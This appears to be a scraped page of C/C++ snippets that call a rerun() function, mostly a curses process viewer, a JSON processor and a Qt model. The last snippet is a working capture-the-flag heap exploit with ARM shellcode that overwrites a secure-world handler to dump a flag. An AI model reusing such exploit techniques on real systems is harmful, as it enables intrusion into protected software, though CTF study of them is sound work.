Пример #1
    char c;
    // ウィンドウを準備する。以下の3行でcursesライブラリを呼び出す
    // cursesプログラムの標準的な初期化手順である
    scrn = initscr();
    noecho(); // キー入力をエコーしない
    cbreak(); // キー入力は即時有効になる。Enterキー入力を必要としない
    // 'ps ax' を実行し出力を処理する
    // ウィンドウに表示する
    // ユーザコマンドループ
    while (1) {
        // ユーザコマンドを受け取る
        c = getch();
        if (c == 'u') updown(-1);
        else if (c == 'd') updown(1);
        else if (c == 'r') rerun();
        else if (c == 'k') prockill();
        else break; // 終了する
    // 元の設定を復元する
Пример #2
// This is the initial run, All it does now is call 
// rerun since that is what an initial run is, a rerun
// of all the code
cluster* initialrun(Queue *q, tree_t* tree)

  cluster* root;
  root = rerun(q,tree,1);
Пример #3
// ハイライト中のプロセスを kill する
    char *pid;
    // strtok() はCのライブラリ関数(詳細はmanを参照)
    pid = strtok(cmdoutlines[cmdstartrow+winrow]," ");
    kill(atoi(pid),9); // シグナル9(SIGKILL;強制終了)をプロセスに
                       // 送るためのUnixシステムコール
Пример #4
 int   main()

    { char c;

     // window setup, next 3 lines are curses library calls, a standard

     // initializing sequence for curses programs

       scrn = initscr();

       noecho(); // don’t echo keystrokes

       cbreak(); // keyboard input valid immediately, not after hit Enter

       // run ’ps ax’ and process the output


       // display in the window


       // user command loop

       while (1) {

           // get user command

           c = getch();

           if (c == ’u’) updown(-1);

           else if (c == ’d’) updown(1);

         else if (c == ’r’) rerun();

         else if (c == ’k’) prockill();

         else break; // quit


      // restore original settings and leave


return 0;

Пример #5
main (int argc, char **argv)
	FILE *f;
	char *infile, *outfile, buf[1000], jsonstr[10000];
	struct json *inp_json, *outp_json;

	if (argc != 2)
		usage ();

	infile = argv[1];

	if ((f = fopen (infile, "r")) == NULL) {
		fprintf (stderr, "error opening file\n");
		return (1);

	memset (&jsonstr, 0, sizeof jsonstr);
	while (fgets (buf, sizeof buf, f) != NULL) {
		sprintf (jsonstr, "%s%s", jsonstr, buf);
	inp_json = json_decode (jsonstr);

	fclose (f);

	outp_json = json_dup (inp_json);

	if (strcmp (json_objref_str (inp_json, "first"), "1") == 0) {
		init (outp_json);
	} else {
		alert ();
		rerun (outp_json);

	outfile = json_objref_str (inp_json, "outfile");
	if ((f = fopen (outfile, "w")) == NULL) {
		fprintf (stderr, "error opening %s for writing: %m\n", outfile);
		return (1);

	char *newjson;
	newjson = json_encode (outp_json);
	fwrite (newjson, 1, strlen (newjson), f);
	fwrite ("\n", 1, 1, f);
	fclose (f);

	return (0);
Пример #6
 void   prockill()

    { char *pid;

       // strtok() is from C library; see man page

       pid = strtok(cmdoutlines[cmdstartrow+winrow]," ");

       kill(atoi(pid),9); // this is a Unix system call to send signal 9,

                            // the kill signal, to the given process


Пример #7
QVariant TestItem::data(int role) const
  switch(role) {
  case DurationRole:
      return duration();
  case ChecksumRole:
    return checksum();
  case DependsRole:
    return depends();
  case TestNameRole:
    return testname();
  case RequiresRole:
    return requires();
  case DescriptionRole:
      return description();

  case CommandRole:
      return command();
  case EnvironRole:
      return environ();
  case PluginRole:
      return plugin();
  case TypeRole:
      return type();
  case UserRole:
      return user();
  case ViaRole:
      return via();

  case GroupRole:
      return group();
  case CheckRole:
      return check();
  case ObjectPathRole:
      return objectpath();
  case RunstatusRole:
      return runstatus();
  case ElapsedtimeRole:
      return elapsedtime();
  case GroupstatusRole:
      return groupstatus();

  case ParentNameRole:

  case ParentIdRole:

  case DepthRole:
      return depth();

  case BranchRole:
      return branch();

  case RerunRole:
      return rerun();

    return QVariant();

  // Prevents non-void return warning from the compiler
  return QVariant();
Пример #8
int main() {
    char mybuf[100];
    TCI *tci = *(TCI **)(0x412770); // only works with the registerd TCI buf!

    tci->data[0] = 0x41;
    tci->data[1] = 0x41;
    tci->data[2] = 0x41;
    tci->data[3] = 0x41;
    tci->data[4] = 0x41;
    tci->data[5] = 0x41;
    tci->data[6] = 0x41;
    tci->data[7] = 0x41;

    // Malloc some stuff
    for(int i = 0; i < 4; i++) {
        do_tci_save(tci, i, 8);

    // free something
    do_tci_save(tci, 2, 64);

        static const char fmt[] __attribute__ ((section (".text"))) = "     phase 2\n\x00\x00\x00\x00\x00";

    // Get a too-large item into the place we allocated the first thing,
    // overwriting the free node for the thing above.

    // The "0x4700300c" below is
    // 300d    adds  r0, #13
    // 4700    bx    r0
    // After some of the do_tci_save operations below, those executable
    // bytes end up clobbering the text section near 0x122C, which is
    // the do_tci_load handler, and at a point in time where our shared
    // buffer is inside r0.
    for(int i = 0; i < 500; i++) {
        // This loop just spams the address we wanted to write at, and the value
        // we wanted written there. I failed to get a "precise" version of this
        // heap exploit working, but effectively what's happening is that the
        // "0x122C - 8" and "0x4700300c" are overwriting some "previous free block"
        // and "next free block" pointers (I forget which order -_-), and the
        // malloc/free activity later causes list-insertion like behavior that
        // essentially runs *0x122C = 0x4700300c
        ((unsigned*)&tci->data)[i] = !(i%2) ? 0x122C - 8 : 0x4700300c;

    // Trigger the malloc bug, and the copy of our spam above.
    do_tci_save(tci, 0, 0xFFFFFFF3);

    for(int i = 0; i < 2; i++) {
        static const char fmt[] __attribute__ ((section (".text"))) = "     phase 3\n\x00\x00\x00\x00\x00";

    // This is the shellcode payload that executes *in* s-el0.
    // (as opposed to this C code itself, which is a shellcode payload
    // that executes in el0).
    // This shellcode actually overwrites itself with the flag; this is
    // because this shellcode lives within the shared page between
    // EL0 and S-EL0. From EL0, we send the shellcode, and then read it
    // back out to find the flag there.

// Code to load flag-containing registers and write them to [r0].
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// mrc p15, 3, r1, c15, c12, 0
// str r1, [r0, #12]
// mrc p15, 3, r1, c15, c12, 1
// str r1, [r0, #16]
// mrc p15, 3, r1, c15, c12, 2
// str r1, [r0, #20]
// mrc p15, 3, r1, c15, c12, 3
// str r1, [r0, #24]
// mrc p15, 3, r1, c15, c12, 4
// str r1, [r0, #28]
// mrc p15, 3, r1, c15, c12, 5
// str r1, [r0, #32]
// mrc p15, 3, r1, c15, c12, 6
// str r1, [r0, #36]
// mrc p15, 3, r1, c15, c12, 7
// str r1, [r0, #40]
// MOVS            R0, #0
// str r0, [r0] // intentional segfault, it's a fine way to exit here.
// svc 0
    static const char dat[] __attribute__ ((section (".text"))) = {0,0,0,
    for(int i = 0; i < sizeof(dat); i++)
        tci->data[i] = dat[i]; // Note: I don't think this loop mattered, just ignore it.
    do_tci_save(tci, 6, sizeof(dat)); // Trigger the free() & malloc() that writes 0x4700300c to the do_tci_load handler.

    // Copy our shellcode into the shared buffer.
    for(int i = 0; i < sizeof(dat); i++)
        tci->data[i] = dat[i];

    // The S-EL0 load handler has been overwritten with something
    // that jumps to our shellcode in the shared buffer.
    do_tci_load(tci, 0, 0);

    // Our code inside do_tci_load hex-dumps the flag (among other junk data).

    return rerun();